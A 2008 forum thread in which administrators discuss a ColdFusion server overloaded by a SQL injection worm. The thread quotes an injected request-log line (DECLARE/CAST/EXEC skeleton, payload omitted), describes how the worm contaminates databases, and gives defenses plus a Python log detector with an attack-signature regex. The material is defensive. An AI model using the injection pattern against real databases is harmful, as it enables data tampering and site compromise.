Jrun Pegging CPU

New Here,
Aug 08, 2008
We have ColdFusion 8.01 Standard running on a Windows 2003. JRun has been pegging the CPU for days. We have installed FusionReactor to monitor requests and nothing seems to account for the CPU being pegged.

We had someone trying to hack into our server but we locked down our code and they are not getting into our sites, but when they try it seems to peg the system. Here is a sample of what they are doing to several of our sites:

2008-08-08 12:17:20.569 1218212240569 3 2114 COMPLETED "" jrpp-26 203.218.119.79 GET http://rockportusa.com/festival-event.cfm 16 20 504896 103523 136192 32668 "id=724';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST([hex-encoded payload omitted]%20AS%20CHAR(4000));EXEC(@S);

Any ideas? We are dead in the water. Please HELP
LEGEND,
Aug 08, 2008
VsVN wrote:
> We have ColdFusion 8.01 Standard running on a Windows 2003. JRun has been
> pegging the CPU for days. We have installed FusionReactor to monitor requests
> and nothing seems to account for the CPU being pegged.
>
> We had someone trying to hack into our server but we locked down our code and
> they are not getting into our sites, but when they try it seems to peg the
> system. Here is a sample of what they are doing to several of our sites:
>
> 2008-08-08 12:17:20.569 1218212240569 3 2114 COMPLETED "" jrpp-26
> 203.218.119.79 GET http://rockportusa.com/festival-event.cfm 16 20 504896
> 103523 136192 32668
> "id=724';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST([hex-encoded payload omitted]%20AS%20CHAR(4000));EXEC(@S);
>
> Any ideas? We are dead in the water. Please HELP
>

This is a well-known attack and it is generating *A LOT* of traffic right
now, not just against CF sites.

How do you have it locked down? I've seen reports where people have
protected their sites so that the attack fails in its goal of appending
undesired text into the database. But the ferocity of the attack
generates SO MANY requests that it actually results in a denial of
service attack.

The general solution I've seen discussed is to fight this as soon
as possible. I've heard of three effective defenses.

1) Code at the top of your CF application (Application.cfm or
Application.cfc) that detects the attack in the URL and bans the IP
address it comes from, so that all future requests from this IP are not
processed.

This stops the attack as fast as ColdFusion can, but if the attack is
ferocious enough, this may not be sufficient to save your server.

2) Stop it at the web server with ISAPI rewrite techniques. More
sophisticated and stops it sooner, but all requests still need to be at
least briefly looked at by the server.

3) Stop it at the firewall. The best and soonest way to stop it, but it
takes a good firewall that may cost some money and/or a lot of manual
effort to keep on top of it.

I believe some people are using all three.
LEGEND,
Aug 08, 2008
P.S. There are some great and extensive discussions on this attack and
the defenses on the House of Fusion [www.houseoffusion.com] cf-talk and
cf-community lists.

But as of this morning it was under *heavy* attack and may be still
suffering outages from it.

New Here,
Aug 08, 2008
We have done everything that you suggested but the CPU is still being pegged at 100%, and FusionReactor shows no requests but JRun is at 99% CPU.

Any ideas what could be causing JRun to go crazy?
New Here,
Aug 09, 2008
If your SQL Server is running on the same machine, you need to understand that this worm attempts to append a Javascript hyperlink into EVERY COLUMN of EVERY RECORD of EVERY TABLE in your entire database. That will bring the SQL Server to its knees in short order.

The quick solution is to go find the various traps people have written that you can install into your Application.cfm file to stop any further contamination. Then you need to go Google the cure that is based on the same code as the infection. It will run through your database and attempt to remove the string from EVERY COLUMN of EVERY RECORD of EVERY TABLE so you're clean again.

Dave Morris
About ready to hire some goons and go kill me some hackers
New Here,
Aug 10, 2008
Our SQL Server is not running on the same machine. We have stopped the injections but our CPU is still pegging out with JRun. We are now on day 5 trying to figure this out.
New Here,
Aug 10, 2008
I presume you've already done things like changing your settings in CF Administrator. How much memory do you have, and how much free disk space for swap files and such? This may be an unrelated issue, so you might have to look in other JRun CPU utilization threads. Sorry I can't be of more help.
New Here,
Aug 11, 2008
I would investigate ways to block traffic to any users who try accessing your site while passing DECLARE%20@S%20CHAR.

I know several of our sites have implemented filters that return an error page immediately if this is passed. This check is done before any other processing, to save server load.

Also, you may want to check the CPU usage on your SQL server to see if that's spiked as well.
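A detector for the filter this post and defense 1) in the earlier reply describe, as an added Python example (not code from the thread or from FusionReactor): it parses request-log lines in the layout quoted in the question, flags the DECLARE/CAST/EXEC signature on the URL-decoded query string, decodes the hex body to show the SQL that would have run, and collects the source IPs for a ban list. The log lines, IP addresses and hex body are constructed stand-ins, and the parser's field layout is assumed from the single line quoted above.

```python
import re
from urllib.parse import unquote
FAKE_BODY = "DECLARE @T varchar(255),@C varchar(4000) -- constructed stand-in for the worm body"
SAMPLE_LOG = [  # constructed lines in the layout of the request log quoted in the question
    '2008-08-08 12:17:19.001 1218212239001 1 12 COMPLETED "" jrpp-25 '
    '198.51.100.7 GET http://example.com/festival-event.cfm 16 20 1024 10 20 30 "id=724"',
    '2008-08-08 12:17:20.569 1218212240569 3 2114 COMPLETED "" jrpp-26 '
    '203.0.113.5 GET http://example.com/festival-event.cfm 16 20 504896 103523 136192 32668 '
    '"id=724\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    + FAKE_BODY.encode().hex().upper() + '%20AS%20CHAR(4000));EXEC(@S);',
]
LOG_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})\s+(GET|POST|HEAD)\s+(\S+)\s.*?"(.*?)"?\s*$')
# Worm signature on the URL-decoded query: DECLARE an (N)(VAR)CHAR variable, CAST a long hex
# literal into it, EXEC it. Case-insensitive, so mixed case or lowercase hex does not slip by.
ATTACK_RE = re.compile(r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\(\d+\).*?CAST\(0x[0-9A-F]{16,}\s+AS"
                       r".*?EXEC\(@\w+\)", re.I | re.S)
HEX_RE = re.compile(r"CAST\(0x([0-9A-F]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.I)


def parse_request(line):
    """Client IP, method, URL and URL-decoded query of one log line (closing quote optional)."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ip, method, url, query = m.groups()
    return {"ip": ip, "method": method, "url": url, "query": unquote(query)}


def decode_hex_payload(query):
    """Recover the SQL hidden inside CAST(0x... AS CHAR); None if there is none."""
    m = HEX_RE.search(query)
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    # NVARCHAR variants carry UTF-16LE text; CHAR/VARCHAR variants are single-byte.
    return raw.decode("utf-16-le" if m.group(2) else "latin-1", errors="replace")


def scan_log(lines):
    """One finding per injected request: source IP, target URL and the decoded SQL."""
    findings = []
    for line in lines:
        req = parse_request(line)
        if req and ATTACK_RE.search(req["query"]):
            findings.append({**req, "sql": decode_hex_payload(req["query"])})
    return findings


def ban_list(lines):
    """Source IPs to drop, in Application.cfm (defense 1) or at the firewall (defense 3)."""
    return sorted({f["ip"] for f in scan_log(lines)})
```

Run over a few days of logs, the count of findings per hour against the CPU graph shows whether the pegged JRun really is just the flood of these requests, which is what the thread suspects.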
Guest
Sep 08, 2008
I am on a shared server. I have some blocking code in my application.cfm file, but the request never even gets there; it is throwing the error: "Diagnostics: Application (wrong name: com/ms/asp/Application) null <br>The error occurred on line -1". There is no ASP being run on the server. Somehow, even though it is throwing before line one of the application.cfm file, it is hitting the SQL server and filling up the page file. I cannot find any references to this error anywhere except that Google returns a single site that has this error occurring on it. Any ideas would be great.